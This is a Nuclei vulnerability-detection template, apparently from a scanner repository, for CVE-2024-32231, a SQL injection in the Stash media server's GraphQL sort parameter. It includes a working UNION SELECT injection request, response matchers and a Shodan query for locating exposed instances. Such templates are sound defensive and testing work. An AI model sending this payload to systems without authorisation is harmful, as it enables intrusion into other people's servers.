49 lines
2.6 KiB
YAML
49 lines
2.6 KiB
YAML
id: CVE-2024-32231
|
|
|
|
info:
|
|
name: Stash < 0.26.0 - SQL Injection
|
|
author: iamnoooob,rootxharsh,pdresearch
|
|
severity: critical
|
|
description: |
|
|
Stash up to v0.25.1 was discovered to contain a SQL injection vulnerability via the sort parameter.
|
|
reference:
|
|
- https://github.com/stashapp
|
|
- https://github.com/stashapp/stash
|
|
- https://github.com/stashapp/stash/pull/4865
|
|
- https://github.com/advisories/GHSA-75jf-52jg-qqh4
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-32231
|
|
classification:
|
|
cve-id: CVE-2024-32231
|
|
epss-score: 0.00045
|
|
epss-percentile: 0.16348
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: html:"<title>Stash</title>"
|
|
tags: cve,cve2024,stash,sqli
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /graphql HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-type: application/json
|
|
|
|
{"operationName":"FindPerformers","variables":{"filter":{"q":"","page":1,"per_page":40,"sort":"name;select performers.id FROM performers union select group_concat(sqlite_version(),':')-- -","direction":"ASC"},"performer_filter":{}},"query":"query FindPerformers($filter: FindFilterType, $performer_filter: PerformerFilterType, $performer_ids: [Int!]) {\n findPerformers(\n filter: $filter\n performer_filter: $performer_filter\n performer_ids: $performer_ids\n ) {\n count\n performers {\n ...PerformerData\n __typename\n }\n __typename\n }\n}\n\nfragment PerformerData on Performer {\n id\n name\n disambiguation\n url\n gender\n twitter\n instagram\n birthdate\n ethnicity\n country\n eye_color\n height_cm\n measurements\n fake_tits\n penis_length\n circumcised\n career_length\n tattoos\n piercings\n alias_list\n favorite\n ignore_auto_tag\n image_path\n scene_count\n image_count\n gallery_count\n movie_count\n performer_count\n o_counter\n tags {\n ...SlimTagData\n __typename\n }\n stash_ids {\n stash_id\n endpoint\n __typename\n }\n rating100\n details\n death_date\n hair_color\n weight\n __typename\n}\n\nfragment SlimTagData on Tag {\n id\n name\n aliases\n image_path\n parent_count\n child_count\n __typename\n}"}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- 'converting driver\.Value type string \(\\"3.*?\\"\) to a int: invalid syntax'
|
|
|
|
- type: word
|
|
part: content_type
|
|
words:
|
|
- "application/json"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450220050c749c3ba06d60772154ce48de57b3a0d290fcaaf27dbd684928899030cde2022100f6b810750d37cafffe2ac67cd6b6cadbf75cff92bcbfaba3b1036fff701152d9:922c64590222798bb761d5b6d8e72950 |